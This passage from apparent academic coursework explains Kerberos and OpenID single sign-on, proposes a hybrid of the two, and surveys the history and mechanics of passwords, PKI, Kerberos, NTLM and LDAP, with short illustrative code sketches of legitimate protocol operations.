Integrated Windows Authentication. Integrated Windows Authentication is a term associated with Microsoft products. It is used most commonly for automatically authenticated connections between Microsoft Internet Information Services and Internet Explorer. Integrated Windows Authentication does not initially prompt for a username and password; instead, the browser exchanges the current user's information with the web server through a cryptographic exchange. Only if this fails does it prompt for a username and password. For Windows NT-based SSO, the Kerberos protocol is also involved, along with other protocols that keep the system working correctly if Kerberos fails.

OpenID SSO. OpenID SSO is quite different from the implementations above. It does not need a centralized server to identify the user and establish authentication between the user and the service server. Users create an account with their preferred OpenID identity provider, and with this account they can sign on to any website that accepts OpenID authentication. The detailed process is introduced later in this report.

2 Kerberos-based SSO

2.1 Terminology (adapted from http://en.wikipedia.org/wiki/Kerberos_(protocol))

Key Distribution Center (KDC). The KDC is a trusted third party between the client and the service server (SS) from which the client requests a service. It consists of two parts: the Authentication Server and the Ticket Granting Server.

Authentication Server (AS). The AS is the server that authenticates the user's identity; it makes sure that you are you, and not anyone else.

Kerberos ticket. A Kerberos ticket is distributed by the AS and encrypted with a server key. It contains a session key, the corresponding user's name, and a time stamp indicating when the ticket is valid.

Ticket Granting Server (TGS). The TGS issues additional tickets.

Ticket Granting Ticket (TGT). The TGT is returned by the AS the first time the client authenticates to it. The client uses this TGT to obtain additional tickets for the SS from the TGS. A TGT has a short life, typically 8 hours, and contains the client ID, the client's network address, the ticket validity period, and the client/TGS session key.

Server key. The server key is the key shared by the AS and the server providing the service.

Session key. A session key is a newly generated key with a time stamp; "newly" means it is generated every time the user requests a new service.

User. The user is the person who uses the client machine to request a service.

Client. The client is the machine that the user uses.
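As an illustration of the terminology, here is a hypothetical sketch of the fields a TGT carries, based on the list above; the names and values are ours, not the real Kerberos wire format.

```python
from dataclasses import dataclass
import time

@dataclass
class TicketGrantingTicket:
    client_id: str          # e.g. the user's principal name
    client_address: str     # the client machine's network address
    session_key: bytes      # the client/TGS session key
    valid_from: float
    valid_until: float      # typically about 8 hours after issue

tgt = TicketGrantingTicket("alice", "192.0.2.10", b"\x00" * 16,
                           time.time(), time.time() + 8 * 3600)
# In the real protocol, this structure travels encrypted under the TGS's
# key, so only the TGS can read or modify it.
```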
Client 1 Reference: http://en.wikipedia.org/wiki/Kerberos_(protocol) 165 “Client” refers to the machine that user uses. 2.2 How it works?2 1. First stage: user authenticates to AS User enters a username and password on client machine. Client hashes the password, and this becomes the private key for user/client. Client sends a plain text contains user name to AS to request services. AS check whether the user name is in its database. If yes, it will return two messages: 1. 2. Client/TGS session key encrypted using the secret key of client/user. (This secret key is pre store in AS, not provided by the client.) TGT which is encrypted using TGS’s private key. Upon client receive the two messages; it will try to decrypt the first message using the private key generated previously. If it can be decrypted successfully, it means the user is the right person. After decrypt first message, client got the session key to communication with TGS. ─ User authentication process end here, by now, user can ask for any services without type in user name and password. All the verification process with be done by client, KDC and SS automatically. 2. Second stage: user ask for service from SS =======================================================3 When user ask for a service, the client will send two messages to TGS: 1. 2. Compose the encrypted TGT and the ID of the requesting service. Encrypt clients’ ID and time stamp with client/TGS session key got from first stage. When TGS receive the two messages, it will get the encrypted TGT and decrypt it with TGS private key. Then TGS get the TGS/Client session key from TGT. And with this session key, TGS decrypted the second 2 3 Reference: http://en.wikipedia.org/wiki/Single_sign-on; Authentication Service for Computer Network.” “Kerberos: Processes within “===” are doing by the client, KDC and SS, user will not involve. 166 An message from client and get client ID with a time stamp. Then it will send client two messages: 1. 2. Client-to-Server ticket, this contains the client’s information and client/server session key. It is encrypted with service server’s private key. Client/server session key encrypted with client/TGS session key. Client get the two messages and decrypt the second message with client/TGS session key and get client/server session key. Upon doing this, client has enough information to authenticate itself to SS. It send two messages to SS: 1. 2. Encrypted client-to-server ticket (the first message got from TGS) Client ID, timestamp encrypted with the client/server session key. When SS receive the two messages from client, it decrypts the first message using its private key to get the client/server session key. And with this session key, SS can decrypt the second message which contains the client information and a timestamp. Then SS will return to client a message contains the timestamp+1, and this message is encrypted with the client/server session key. This message is a confirmation message. When client receive the confirmation message, it decrypts the message with client/server session key and to check if the timestamp has updated. If yes, then the client can trust the SS. And then, the client can start requesting services. =================================================== The server provided the requested service to client. ─ To now everything is done and the user can enjoy the services without entering username and password again and again. 
2.3 A diagram showing the whole process

(Adapted from http://en.wikipedia.org/wiki/File:Kerberos.png; the printer there is an example of an SS.)

3 OpenID SSO

(This section is based on "OpenID Authentication 2.0 – Draft 11", http://openid.net/specs/openid-authentication-2_0-11.html.)

3.1 Terminology

End-user. The end-user is the entity who wants to assert a particular identity, namely the OpenID holder.

Identifier or OpenID. The OpenID is a URL or XRI that the end-user holds to prove the end-user's identity.

Identity provider or OpenID provider. The OpenID provider, "OP", is the service that provides OpenID registration and authentication; i.e., the end-user obtains an OpenID from the OP.

Relying party. The relying party is the service provider, the site that wants to verify the end-user's identity.

User-agent. The user-agent is the program the end-user uses to communicate with the relying party and the OpenID provider, typically a web browser implementing HTTP/1.1.

OP Endpoint URL. The OP Endpoint URL is the URL that accepts OpenID authentication; it is obtained from the OpenID identifier the user supplies.

3.2 How it works

(The following is based on http://www.windley.com/archives/2006/04/how_does_openid.shtml.)

When the end-user wants to log in to a site, he or she is presented with a login form (these days, mostly a button for Google, Yahoo, Facebook, etc.). The user responds with the OpenID, i.e., the URL. The relying party receives the URL and derives the OP endpoint URL from it, a process called "normalizing". After obtaining the OP endpoint URL, the relying party communicates with the OP to establish a shared secret using a Diffie-Hellman key exchange (this step is optional and can be skipped if the relying party and the OP have an established association). The relying party then redirects the end-user's browser to the OP with an OpenID authentication request. The OP presents a window requesting the end-user's name and password (skipped if the end-user is already logged in to the OP), and the end-user sends the username and password to the OP server. If they are correct, the end-user has authenticated to the OP, which then returns a form asking whether the end-user trusts the relying party. Based on the end-user's response, the OP redirects the user-agent to one of the URLs provided by the relying party, and the relying party returns the corresponding page to the end-user.

─ The relying-party authentication ends here. If the user's OP username and password are correct and the user chooses to trust the relying party, the user is successfully logged in to the relying party's site.
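The sketch below illustrates how a relying party might verify an OP's signed response using an HMAC-SHA256 association of the kind discussed in Section 4.2. The field names and payload format are our simplifications, not the exact OpenID 2.0 wire format.

```python
import hashlib
import hmac

# Shared secret from the (optional) Diffie-Hellman association step.
shared_secret = b"example-association-secret"

def sign(fields: dict) -> str:
    payload = "&".join(f"{k}={v}" for k, v in sorted(fields.items()))
    return hmac.new(shared_secret, payload.encode(), hashlib.sha256).hexdigest()

# The OP signs the positive assertion before redirecting the user-agent back.
response = {"claimed_id": "https://alice.example.org/",
            "op_endpoint": "https://op.example.com/auth"}
signature = sign(response)

# The relying party recomputes the MAC and compares it in constant time.
accepted = hmac.compare_digest(signature, sign(response))
print(accepted)  # True -> the relying party logs the end-user in
```

4 Comparison between Kerberos-based SSO and OpenID SSO

In this part, I compare the two implementations of SSO in several ways.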
o For Kerberos, its largest drawback is that all the information is store in KDC, and if KDC fails, everything would not work, this is not good for information availability. However, for other type of attack like man-in-middle attack, Kerberos can defend them quite well. o For OpenID, the most concerned security issue should be the manin-middle attack. In earlier version of OpenID, it is very weak to protect the attack. In the newest version, developers introduce some techniques like nonce to defend the attack. However it is still cannot solve the problem. A sophisticated hacker can get end-user’s identifier and make use of it easily. 4.2 Encryption Kerberos Kerberos protocol use data encryption standard (DES) encryption during the communication between client, SS and KDC. And it also uses checksum to ensure the integrity. OpenID OpenID support three signature algorithms: 171 1. 2. 3. No encryption. HMAC-SHA1 -160 bit key length12 HMAC-SHA256 -256 bit key length13 ─ From the encryption methods, we can see that both implementations have a good enough algorithm to encrypt the messages to ensure confidentiality. However, for OpenID, we can also see that because it is a new technology, it has not set up a standard. Relying parties may use difference signature algorithm and some even not use, which will increase the risk from being attacked. 4.3 Easy to use? Kerberos based SSO The set-up of Kerberos based SSO is really making life easier for users. It achieves the goal that entering username and password only once and then the system will automatically log the user in to other independent systems. OpenID As far as I see, OpenID is not so convenient to use. Although a lot of the websites join the OpenID standard, most of them still use their own username and password. Even when user wants to log in using OpenID identifier, they need to copy the URL first (at least remembering the URL). For some sites, they will provide some OpenID provider options for user to log in, typically Google, Facebook, Yahoo, etc. This makes things easier to some degree since for a normal user, their account, say, Google account will always in logged in state. However, OpenID is still a great idea. And I think it would be the right way to log to website in the future. 4.4 Any similarities? I always wonder are there any common points between Kerberos and OpenID. So I write out the main working flow of them in a simplified way. Kerberos 12 13 RFC2104 and RFC 3174 RFC2104 and FIPS180-2 172 o o o o o o User enter username and password KDC authenticate the user User request a new service from SS Client (user’s machine) go for KDC for ticket Client gets ticket and sends it to the SS. User get the service OpenID o o o o o o User present a URL to log in to a relying party Relying party go for the OP to authenticate the user. OP prompts a window for username and password.14 User enters the username and password. OP authenticate the user and redirect to relying party User log into the relying party. ─ From above, we can see that Kerberos and OpenID have some similarities. In OpenID, the OP plays the role of KDC and the relying party takes the job of user’s machine to communicate with OP. Kerberos implementations’ biggest drawback is it needs a central server to store all the information and process all the requests. If it is down, everything will fail. Also, OpenID faces the difficulty to protect from man-in-middle attack. So is there any ways to combine these two implementations to provide a better solution? 
4.3 Ease of use

Kerberos-based SSO. Kerberos-based SSO genuinely makes life easier for users: it achieves the goal of entering a username and password only once, after which the system automatically logs the user in to the other independent systems.

OpenID. As far as I can see, OpenID is not as convenient to use. Although many websites have joined the OpenID standard, most of them still use their own usernames and passwords. Even when users want to log in with an OpenID identifier, they first need to copy the URL (or at least remember it). Some sites provide OpenID provider options to log in with, typically Google, Facebook or Yahoo. This makes things easier to some degree, since a normal user's account at, say, Google will usually already be in a logged-in state. OpenID is nevertheless a great idea, and I think it points to the right way to log in to websites in the future.

4.4 Any similarities?

I have always wondered whether there are any common points between Kerberos and OpenID, so I wrote out their main working flows in a simplified way.

Kerberos
o The user enters a username and password.
o The KDC authenticates the user.
o The user requests a new service from an SS.
o The client (the user's machine) goes to the KDC for a ticket.
o The client gets the ticket and sends it to the SS.
o The user gets the service.

OpenID
o The user presents a URL to log in to a relying party.
o The relying party goes to the OP to authenticate the user.
o The OP prompts for a username and password (skipped if the user is already logged in).
o The user enters the username and password.
o The OP authenticates the user and redirects to the relying party.
o The user is logged in to the relying party.

─ From the above, we can see that Kerberos and OpenID have some similarities: in OpenID, the OP plays the role of the KDC, and the relying party takes over the user machine's job of communicating with the OP. The biggest drawback of Kerberos implementations is that they need a central server to store all the information and process all the requests; if it is down, everything fails. OpenID, meanwhile, struggles to protect against man-in-the-middle attacks. So is there any way to combine the two implementations into a better solution?

My Kerberos-OpenID

o The user wants to log in to a relying party through an OP.
o The user-agent (the user's browser or machine) checks whether the user is logged into the OP; if not, it prompts the user to log in. If yes, the user-agent sends the username and the relying party's URL to the OP.
o The OP sends back two messages. The first message is the client's information and a session key, encrypted with the relying party's private key (the key the relying party shares with the OP; see the assumptions below). The second message is the session key encrypted with the user's password.
o The client obtains the session key using the user's password, then sends the first message along with a timestamp encrypted with the session key.
o The relying party receives the two messages. It first decrypts the first message to get the session key and the client information, and checks the client information to ensure the sender is not someone else. It then decrypts the timestamp with the session key, updates the value, encrypts it with the session key again and sends it back. At the same time, the relying party can log the user in.
o When the client receives the timestamp, it checks that it is correct; at this stage the client also trusts the relying party.

─ Except for the first message, which contains the username, all messages are encrypted under keys, and the session key is only valid for a short period. This is very similar to how Kerberos SSO works.

─ Assumptions:
o Every relying party maintains a table of the private keys it shares with each of the OPs.
o Relying parties trust the OPs.
o The user trusts the OPs.

A small sketch of this exchange is given below.
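To make the proposed exchange concrete, here is a minimal sketch in Python using the Fernet cipher from the third-party cryptography package as a stand-in for the symmetric encryption. All key names and message layouts are illustrative assumptions, not a finished design.

    from cryptography.fernet import Fernet  # pip install cryptography

    # Hypothetical long-term keys. k_rp is the secret the OP shares with the
    # relying party; k_user stands in for a key derived from the user's password.
    k_rp, k_user = Fernet.generate_key(), Fernet.generate_key()
    session_key = Fernet.generate_key()

    # The OP builds the two messages of the proposed scheme.
    msg1 = Fernet(k_rp).encrypt(b"user=alice;" + session_key)  # for the relying party
    msg2 = Fernet(k_user).encrypt(session_key)                 # for the user

    # The client recovers the session key and authenticates with a timestamp.
    sk = Fernet(k_user).decrypt(msg2)
    authenticator = Fernet(sk).encrypt(b"timestamp=2011-11-01T12:00:00Z")

    # The relying party opens msg1, recovers the session key, checks the
    # client information, and verifies the timestamp.
    opened = Fernet(k_rp).decrypt(msg1)
    recovered_sk = opened[len(b"user=alice;"):]
    assert Fernet(recovered_sk).decrypt(authenticator).startswith(b"timestamp=")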
5 Conclusion

This report has introduced Kerberos-based Single-Sign-On and a newer technology called OpenID. I compared the two through their implementation environments and encryption methods, and examined whether they make users' lives easier. At the end I proposed a combination of the two, which concludes the report.

6 References

1. http://en.wikipedia.org/wiki/Kerberos_(protocol)
2. B. Clifford Neuman, Theodore Ts'o: Kerberos: An Authentication Service for Computer Networks.
3. OpenID Authentication 2.0 - Draft 11. http://openid.net/specs/openid-authentication-2_0-11.html#RFC2631
4. http://en.wikipedia.org/wiki/OpenID
5. http://www.windley.com/archives/2006/04/how_does_openid.shtml

An Exploration into the Various Authentication Methods Used to Authenticate Users and Systems

Gee Seng Richard Heng, Horng Chyi Chan, Huei Rong Foong, Wei Jie Alex Chui
National University of Singapore, School of Computing, Singapore

Abstract. In this paper, we explore the major techniques used for authenticating operating systems and users from a historical perspective. The paper provides a timeline that clearly illustrates how authentication methods have evolved over time, and introduces the history of each authentication technique. It also describes the steps involved in authenticating users and systems for each method, along with the limitations of some of them.

Keywords: Authentication, CA, CP, Encryption, Handshake, Historical, Host-based, IETF, KDC, Kerberos, LDAP, Microsoft Login, MIT, MS-CHAP, NTLM, OS, Open Source, Passwords, PKC, PKI, Private Key, Protocols, Public Key, Rhost, SSH-1, SSH-2, SSL, Third-Party, TLS, Transport Layer, UNIX, Windows, X.500

1 Introduction

Over the years, many different techniques have been used for authentication. Authentication protocols allow a user to access network resources or log on to a domain once the user's identity is confirmed. With so many techniques available, choosing the appropriate authentication method for each setting becomes the most crucial decision in authenticating users and securing systems. We look at the various authentication methods below in chronological order.

2 Timeline of Authentication Methods Used on Different Operating Systems

During the 1980s and 1990s, many new authentication methods emerged, with further improvements along the way. The earliest authentication method for users and systems, featured in log-in commands from 1961 onwards, is the password. Over time, passwords improved from mere plaintext passwords to challenge-response schemes. The need for a trusted authority to certify the trustworthiness of public keys motivated Public Key Infrastructure (PKI), conceived in 1969; its concepts were publicly released in 1976. Microsoft's oldest and first authentication protocol, the LAN Manager, was introduced along with Windows 3.11 in 1992 and was primarily used in operating systems earlier than Windows NT 3.1. NTLMv1 and NTLMv2, the successors of LAN Manager, were released in later versions of Windows NT. After Kerberos was released as open source in 1987, many organizations adopted it, including Microsoft: Kerberos replaced NTLM as the preferred authentication in Windows 2000 and beyond. In 1994, Netscape developed SSL for securing communication sessions; the latest version, TLS 1.2 (SSL 3.3), was released in 2008 and further improved in 2011. In early 1995, the Helsinki University of Technology in Finland was a regular victim of password-sniffing attacks, which prompted one of its researchers to create SSH (SSH-1) as a countermeasure; it was then released to the public as open source. Finally, LDAP is another popular application protocol, used for communicating record-based data and maintaining distributed directory information services over a network; LDAP and LDAPv3 came out in 1993 and 1997 respectively. Figure 1 illustrates the timeline of the various authentication methods.

Figure 1: Timeline of the various authentication methods.

3 Authentication Methods Used on Operating Systems

3.1 Passwords

3.1.1 Introduction to Passwords
Passwords are the most basic and widely used form of authentication. In IT, passwords are commonly combined with usernames for better security when accessing resources such as accounts and documents. Passwords can be stored as plaintext or encrypted with different algorithms, and do not necessarily need to be actual words. Since passwords rely on secrecy, encrypting them is encouraged for better security. Password authentication is nevertheless open to several vulnerabilities, which can be exploited through social engineering, password sniffing, man-in-the-middle attacks, dictionary attacks, brute force and birthday-paradox attacks [1].

3.1.2 Passwords from a Historical Perspective
In the context of computing and information technology, the Massachusetts Institute of Technology (MIT) created the first system with a log-in command that prompts the user for a password in 1961 [2]. In the past, passwords were stored as plaintext in a database on the same server. This was one of the oldest and weakest authentication methods: because passwords were sent in clear text from the clients to the server, anyone who could intercept the connection could retrieve the exact password. The one-way hash function was introduced to improve password security. However, if someone intercepts the hashed password during authentication, the password can still be compromised once the hash is deciphered. Therefore, a further improvement was added to password security: the use of challenge-response passwords [2].
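As an illustration of these two improvements, the following Python sketch stores a salted one-way hash of the password and then uses it in a simple challenge-response, so that neither the password nor its hash crosses the wire. The scheme shown is a generic sketch, not any particular vendor's protocol.

    import hashlib, hmac, os

    def store_password(password):
        # Store a salted one-way hash instead of the plaintext password.
        salt = os.urandom(16)
        digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100000)
        return salt, digest

    def challenge_response(password_digest, challenge):
        # Both sides derive the same value from the stored digest and a
        # fresh challenge, so the secret itself is never transmitted.
        return hmac.new(password_digest, challenge, hashlib.sha256).digest()

    salt, digest = store_password("correct horse battery staple")
    challenge = os.urandom(16)                        # issued by the server
    response = challenge_response(digest, challenge)  # computed by the client
    assert hmac.compare_digest(response, challenge_response(digest, challenge))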
3.2 Public Key Infrastructure (PKI)

3.2.1 Introduction to PKI
Public Key Infrastructure (PKI) is based on a third-party trust system. The third party that assures that an individual or other entity is who they claim to be is called a Certificate Authority (CA). The non-repudiation evidence is contained in a digital certificate that has been digitally signed by the CA; two parties with no prior relationship can therefore trust each other's identities. One example of this kind of certification is authenticating to a computing resource by presenting a digital certificate as non-repudiation proof instead of using passwords. A Certificate Policy (CP) assures the communicating parties that they can trust the CA; it states how the CA establishes identities and how it manages keys and certificates. The CA generates certificates, publishes them, and publishes the revocation lists used to reject compromised keys. Current PKI implementations use certificates based on the X.509 v3 standard for interoperability between implementations [3]. PKI supports the use of public key encryption on an insecure public network, such as the Internet, to exchange data securely and privately. It assumes the use of public and private cryptographic key pairs, obtained and shared through a trusted authority, for authenticating a message sender or encrypting a message [4].

3.2.2 PKI from a Historical Perspective
The concepts behind Public Key Infrastructure were first developed in 1969 by James Ellis, a British scientist at GCHQ [5]. Whitfield Diffie and Martin Hellman of Stanford University and Ralph Merkle of the University of California at Berkeley were the first researchers to uncover and publicly disclose the concepts of PKI and Public Key Cryptography (PKC), in their 1976 paper "New Directions in Cryptography". The Diffie-Hellman-Merkle public/private key exchange algorithm also paved the way for secure public key distribution, although it did not provide digital signatures. A year later, Ronald L. Rivest, Adi Shamir and Leonard M. Adleman, another team of mathematicians, at MIT, found a way to apply Diffie and Hellman's theories in a real-world context and named their encryption method RSA, combining the initials of their names. RSA rests on multiplying prime numbers to form a large number that is difficult to factor; this makes it hard to crack, exactly fitting the requirements of a practical public key cryptography implementation [6].

3.2.3 Public Key Cryptography / Public-Key Encryption
Public key cryptography is based on extremely complex mathematical problems and uses two keys, a public key and a private key. The private key is used for decrypting messages and for creating digital signatures; the public key is used for encrypting messages and verifying signatures. Public keys are made available to the public and published in public directories on the Internet for easy retrieval; this is one of the advantages of public key cryptography, and it also makes key management easier. With the public key exposed to the Internet, its integrity is critical and is assured by a certification process completed by a certification authority (CA). Once the CA certifies a public key, it signs the key digitally, so that people can trust it. Both the private and public keys are created concurrently with the same algorithm by the CA. The private key is issued only to the requesting party, while the public key can be accessed by all parties from a public directory [7]. The private key is never shared or sent across the Internet; it is used to decrypt text that has been encrypted with the corresponding public key. Thus, users can obtain a public key from a central administrator or an online public directory and use it to encrypt a message, and the receiver decrypts the message with his or her private key. In addition to decrypting messages, the private key provides non-repudiation: it encrypts (signs) a digital certificate, and when a message is sent with such an encrypted signature, the signature can be verified with the sender's public key [4]. The following table restates this, and a short code sketch follows it:

Task                                                         Key used
Send an encrypted message                                    the receiver's public key
Send an encrypted signature                                  the sender's private key
Decrypt an encrypted message                                 the receiver's private key
Decrypt an encrypted signature (and authenticate the sender) the sender's public key
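A brief sketch of these operations, using the third-party Python cryptography package; the key size and padding choices are illustrative.

    from cryptography.hazmat.primitives import hashes
    from cryptography.hazmat.primitives.asymmetric import padding, rsa

    private_key = rsa.generate_private_key(public_exponent=65537, key_size=2048)
    public_key = private_key.public_key()
    message = b"a signed message"

    # Sign with the sender's private key ...
    pss = padding.PSS(mgf=padding.MGF1(hashes.SHA256()),
                      salt_length=padding.PSS.MAX_LENGTH)
    signature = private_key.sign(message, pss, hashes.SHA256())

    # ... and verify with the sender's public key (raises on failure).
    public_key.verify(signature, message, pss, hashes.SHA256())

    # Encrypt to the receiver's public key; decrypt with the private key.
    oaep = padding.OAEP(mgf=padding.MGF1(hashes.SHA256()),
                        algorithm=hashes.SHA256(), label=None)
    ciphertext = public_key.encrypt(message, oaep)
    assert private_key.decrypt(ciphertext, oaep) == message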
3.3 Kerberos

3.3.1 Introduction to Kerberos
Kerberos was developed from the Needham-Schroeder authentication protocol. It is a trusted third-party authentication service that provides authentication on an open network: all clients that use Kerberos trust its accurate judgment of the identity of each of the other clients, and therefore it is trusted. Timestamps were added to the original Needham-Schroeder model to check for replay, since a message could be stolen from the network and resent later [8].

3.3.2 Kerberos from a Historical Perspective
The Massachusetts Institute of Technology (MIT) started developing Kerberos in 1983 as part of Project Athena, and it became an IETF standard in 1993. Since MIT released Kerberos as open source in 1987, many organizations have adopted it; Kerberos is a popular network authentication protocol used by Microsoft, Apple, Red Hat, Sun and many more [9]. Windows 2000 and Windows XP use Kerberos as their default authentication method for two underlying reasons: Kerberos is open source, which allows Microsoft to create its own extensions for Microsoft's applications, and Kerberos is reliable for network authentication [10]. Kerberos replaced NTLM as the preferred authentication protocol in the Active Directory-based single sign-on scheme of Windows 2000 and above.

3.3.3 How does the Kerberos protocol work?
Kerberos holds a database of its clients and their secret keys; each secret key is known only to Kerberos and to the client it belongs to. If the client is a user, the secret key is derived from his encrypted password. Both network services and clients have to register with Kerberos before they can use its services, and the secret key is negotiated during registration. Since Kerberos holds the clients' secret keys, it can convince one client of the identity of another, and it also creates session keys for the transmission of messages between two clients [8]. The following steps show how Kerberos works; a miniature sketch follows the list:

1) First, the client sends a request to the authentication service (AS), which verifies the client by looking up the client's ID in its database. The AS then creates a session key (SK1) and encrypts it with the client's secret key, and also creates a ticket-granting ticket (TGT) encrypted under the ticket-granting server's (TGS) secret key.
2) The client decrypts the message to get the session key and uses it to create an authenticator. The client sends both the authenticator and the TGT to the TGS to request access to the target server. The TGS decrypts the TGT to obtain the session key, with which it decrypts the authenticator in order to verify the client. After verification, the TGS creates a new session key (SK2) encrypted with SK1, along with a session ticket encrypted with the service server's secret key.
3) The client then creates an authenticator using SK2 and sends it to the service server together with the session ticket. For applications that require two-way authentication, the service server sends back a message encrypted with SK2, completing the authentication.
4) Finally, the client and server use the symmetric key they now both know for transmitting data [11].
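The fragment below, using the Fernet cipher from the third-party Python cryptography package as a stand-in for Kerberos' actual ciphers, shows the core trick of steps 1 and 2: the KDC wraps the same session key once for the client and once inside a ticket that only the TGS can open. Names and message formats are hypothetical.

    from cryptography.fernet import Fernet  # pip install cryptography

    # Long-term secrets held by the KDC (hypothetical values).
    k_client = Fernet.generate_key()   # shared with the client
    k_tgs = Fernet.generate_key()      # shared with the ticket-granting server

    # Step 1: the AS wraps a fresh session key twice.
    sk1 = Fernet.generate_key()
    for_client = Fernet(k_client).encrypt(sk1)            # only the client can open
    tgt = Fernet(k_tgs).encrypt(b"client=alice;" + sk1)   # only the TGS can open

    # Step 2: the client recovers SK1 and builds an authenticator.
    sk1_client = Fernet(k_client).decrypt(for_client)
    authenticator = Fernet(sk1_client).encrypt(b"alice;ts=2011-11-01T12:00")

    # The TGS opens the TGT, recovers SK1 and verifies the authenticator.
    sk1_tgs = Fernet(k_tgs).decrypt(tgt)[len(b"client=alice;"):]
    assert Fernet(sk1_tgs).decrypt(authenticator).startswith(b"alice")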
3.3.4 Kerberos Weaknesses
Even after several published versions, Kerberos is still plagued by some weaknesses.

a) Replay Attacks. In Kerberos version 4, even with the inclusion of a timestamp in the authenticator, a replay attack is difficult but still possible. The replay cache was therefore introduced in Kerberos version 5 with the intention of preventing such attacks: authenticators are stored on the servers so that replicas can be rejected. However, if an attacker manages to copy the ticket and authenticator and send them to the application server before the user's real request arrives, the attacker can use the service [12].

b) Password-Guessing Attacks. This attack is still not resolved in Kerberos version 5 [14]. An attacker can intercept one of the Kerberos tickets; since the ticket is encrypted with a key based on the client's password, the attacker may mount a brute-force attack to decrypt it. If the attacker succeeds in decrypting the ticket, the client's password is discovered in the process [13].

c) Single Point of Failure. The Key Distribution Centre (KDC) must be available at all times: if the KDC is down, no one can log in or use the services. This can, however, be mitigated by running more than one Kerberos server [13].

3.4 NTLM

3.4.1 Introduction to NTLM
NTLM is a suite of Microsoft security protocols used in various Microsoft network protocol implementations; it provides users with authentication, integrity and confidentiality. Microsoft's systems use NTLM as an integrated single sign-on mechanism, reusing the credentials obtained during the interactive logon process, which consist of a domain name, a user name and a hash of the user's password [15]. There are two types of NTLM authentication. Interactive NTLM authentication takes place between the client and a domain controller, with the user providing his logon details during the process. Non-interactive NTLM authentication lets an already logged-on user access further resources on a server without interactively logging on again [16].
3.4.2 NTLM from a Historical Perspective
NTLM was the default protocol for network authentication in Windows NT 4.0 and earlier Windows operating systems, and was replaced by Kerberos as the standard in Windows 2000 [15]. NTLM comprises three challenge-response authentication methods, whose main difference is their level of encryption.

LAN Manager (LM): LM was the first of these secured authentication protocols and was introduced along with Windows 3.11 [18]. LM authentication provides the weakest encryption and is considered the least secure of the three [19].

NTLM version 1: NTLMv1 replaced LM authentication and is a more secure form of authentication, using 56-bit encryption and storing user credentials as NT hashes [19]. NTLMv1 was introduced in Windows NT 3.1 [18].

NTLM version 2: NTLMv2 was later released to replace NTLMv1 and was introduced in Windows NT Service Pack 4. It is the latest version of NTLM and currently the most secure of these challenge-response schemes, using 128-bit encryption [19]. It is supported by all versions of Windows from NT SP4 onwards [20]. Windows Vista and newer versions of Windows use NTLMv2 as a fallback in situations where Kerberos cannot be used; the protocol remains supported in Windows 2000 and above even though Kerberos has replaced it as the default [17].

3.4.3 How does NTLM work?
NTLM uses a challenge-response method that allows clients to authenticate to a server without sending their password in plaintext [14]. The NTLM challenge-response mechanism consists of three messages, known as negotiation, challenge and authentication. The following steps illustrate the process; since NTLM's integrated single sign-on supports both interactive and non-interactive authentication, only step 1 occurs in the interactive part. A simplified sketch follows the list.

1. The user enters a domain name, username and password into a client computer. The computer cryptographically hashes the password and discards the plaintext.
2. The client sends the username to the server in plaintext.
3. The server generates a 16-byte random number, the challenge, and sends it to the client.
4. The client encrypts the challenge with the hash of the user's password and returns the result to the server as the response.
5. The server forwards the username, the challenge sent to the client, and the response received from the client to the domain controller.
6. The domain controller uses the username to obtain the hash of the user's password from the Security Account Manager database and uses it to encrypt the challenge.
7. Finally, the domain controller compares its encrypted challenge from step 6 with the response from the client; authentication succeeds if they match [16].
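A simplified Python sketch of steps 3 to 7 is shown below. The real NT hash is MD4 over the UTF-16LE password, and NTLMv2 computes its response with HMAC-MD5 over additional fields; here MD5 stands in for MD4 and the response is reduced to a single HMAC, so this illustrates only the shape of the challenge-response.

    import hashlib, hmac, os

    def nt_hash(password):
        # The real NT hash is MD4 over the UTF-16LE password; MD4 support in
        # hashlib depends on OpenSSL, so MD5 stands in for it here.
        return hashlib.md5(password.encode("utf-16-le")).digest()

    challenge = os.urandom(16)   # step 3: the server's random challenge

    # Step 4: the client keys a function of the challenge with its
    # password hash (simplified relative to real NTLM).
    response = hmac.new(nt_hash("secret"), challenge, hashlib.md5).digest()

    # Steps 6-7: the domain controller recomputes from the stored hash.
    expected = hmac.new(nt_hash("secret"), challenge, hashlib.md5).digest()
    assert hmac.compare_digest(response, expected)   # authentication succeeds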
3.5 Lightweight Directory Access Protocol (LDAP)

3.5.1 Introduction to LDAP
LDAP is a popular application protocol for communicating record-based data and maintaining distributed directory information services over a network. LDAP is based on a simpler standard than X.500. The directory service provides a set of records in a hierarchical structure, such as an e-mail directory. LDAP is mostly used on UNIX for authentication and is found in many other business environments.

3.5.2 LDAP from a Historical Perspective
In its early engineering stages, LDAP was known as the Lightweight Directory Browsing Protocol (LDBP). LDAP was created by Tim Howes, Yeong Wengyik and Steve Kille in 1993, and LDAPv3 was published in 1997 through the work of Tim Howes and Steve Kille. To understand LDAP from a historical perspective, we need to consider the Directory Access Protocol (DAP) and X.500, from which it is derived [21]. In X.500, the Directory System Agent (DSA) is hierarchical in form and provides efficient, fast searching and retrieval, while the Directory User Agent (DUA) provides functionality that can be implemented in all sorts of user interfaces: dedicated DUA clients, e-mail applications or web server gateways [21]. DAP is used in X.500 services for controlling the communications between DSA and DUA agents. LDAP is a subset of the X.500 protocol, and LDAP clients are easier to implement and faster than X.500 clients. Active Directory supports access via LDAP from any LDAP-enabled client, though it is not a pure X.500 directory [21]: it uses LDAP as the access protocol and supports the X.500 information model without requiring systems to host the entire X.500 overhead [21]. By combining LDAP, the best of the X.500 naming standards and a rich set of APIs, Active Directory enables a single point of administration for all resources [21].

3.5.3 How does LDAP work?
LDAP is based on a client/server model and offers operations such as Bind, Search and Compare, and Update. LDAP's authentication is supplied by the Bind (authenticate) operation, which establishes the authentication state for a connection and sets the LDAP protocol version. An LDAP client first authenticates itself to the LDAP service by connecting to the LDAP server (known as a DSA) on TCP port 389 and sending an operation request; a client that sends LDAP requests without binding is treated as an anonymous client [22]. The client must indicate to the server who is going to access the data, so that the server can decide what the client may see and do; this is known as access control. The server then responds with the answer, or with a pointer to another LDAP server where the client can obtain more information [22]. Clients do not need to wait for a response before sending the next request, and may send requests in any order; the same holds for the server.
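A minimal bind, sketched with the third-party Python ldap3 package; the host, distinguished name and password are hypothetical.

    from ldap3 import Server, Connection, ALL  # pip install ldap3

    server = Server("ldap.example.com", port=389, get_info=ALL)
    conn = Connection(server,
                      user="uid=alice,ou=people,dc=example,dc=com",
                      password="secret")

    if conn.bind():      # the Bind operation establishes the auth state
        conn.search("dc=example,dc=com", "(uid=alice)", attributes=["cn"])
        print(conn.entries)
        conn.unbind()
    else:
        print("bind failed:", conn.result)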
